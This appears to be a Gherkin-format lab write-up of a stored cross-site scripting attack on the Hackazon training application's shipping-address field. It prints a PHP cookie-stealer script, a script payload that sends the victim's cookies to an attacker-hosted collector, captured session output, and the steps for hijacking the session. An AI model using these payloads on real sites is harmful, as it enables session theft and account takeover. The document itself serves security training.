# language: en

Feature: Stored Cross-Site Scripting
  From the Hackazon system
  Of the category A7: Cross-Site Scripting
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Postman Versión 6.2.5 (6.2.5)
    Given the following scenario
    """
    URN: /checkout/shipping
    Message: Shopping Cart
    Fields: addressLine1
    Details:
      - Form to specify the address where the product must be delivered
      - A Button to save the information and go to the next step (Billing)
    Objective: Perform an XSS attack to the web page
    """

  Scenario: Session Hijacking
    Given I have added a product to the cart and standing in the shipping step
    When on the field 'Address line 1' I enter a simple XSS to check if is vul
    """
    Input:  <script>alert(1)</script>
    Output: A pop up dialog showing the number 1
    """
    Then the script is stored in the database and every time displays the dialog
    Given I have coded a cookie stealer and hosted in my personal computer
    """
    1  <?php
    2    $cookies = $_GET["cookie"];
    3    $file = fopen("log.txt", "cookie");
    4    fwrite($file, $cookies."\n");
    5    # Redirects the user to the home page
    6    header("Location: http://localhost/");
    7    die;
    8  ?>
    """
    When I pass to the vulnerable field a XSS to send me the session cookies
    """
    Input:  <script>
            location.href='http://localhost:8080/index?cookie='+document.cookie;
            </script>
    Output: The user is being redirected to the home page
    """
    Then the cookies are stored in the file 'log.txt' (including the PHPSESSID)
    """
    visited_products=,3,64,101,21,1,2,16,;
    PHPSESSID=itpm7usklpkml457up1rmos191;
    security_level=0
    """
    When I open a new browser and set the value of PHPSESSID to the stolen
    Then it gives me access continuing with the session that the user had open
